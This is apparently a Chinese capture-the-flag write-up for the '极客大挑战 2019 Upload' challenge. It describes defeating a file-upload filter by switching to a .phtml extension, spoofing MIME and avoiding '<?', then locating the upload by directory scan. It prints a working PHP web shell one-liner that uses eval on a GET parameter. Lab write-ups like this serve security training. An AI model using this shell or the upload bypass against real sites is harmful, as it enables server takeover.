[极客大挑战 2019]Upload

[极客大挑战 2019]Upload#

直接上传了木马文件，无法上传，先判断一下限制是来自客户端(js)还是服务端(对文件后缀、MIME等的检查)

禁用js之后，再上传一下，还是被拦截了，说明是在服务端进行过滤的。

测试服务端的限制，发现含有 php、php2 的都会被拦截掉，说明这是一个黑名单拦截

又修改了 MIME 进行绕过，依然不行，但是根据提示看就知道，被拦截的原因是文件内容被检查了,存在**<?** 就无法上传成功。

使用 js 执行 php 代码，网上找了一个不用 <? 的php一句话代码，修改一下提交。

<script language='php'>eval($_GET['cmd']);</script>

上传的后缀是 phtml 是为了页面可以正常解析php代码。

PHTML网页是一种包含PHP脚本的网页，PHP脚本镶嵌在网页的HTML代码之中。在页面被发送给请求的用户之前，网页服务器调用PHP解释程序来解释和执行PHP脚本。含有PHP脚本的网页通常都以“.php”、“.php3”或“.phtml”作为后缀。和ASP一样，PHP可以被认为是一种“动态网页”。

使用目录扫描，扫描下 文件上传到了哪个目录下面，一般是 upload、file、upload-file、之类的，一般都可以扫出来。

正常访问到了上传的木马文件，接着连接上找找flag就 ok 了

这 上传了不少文件啊 。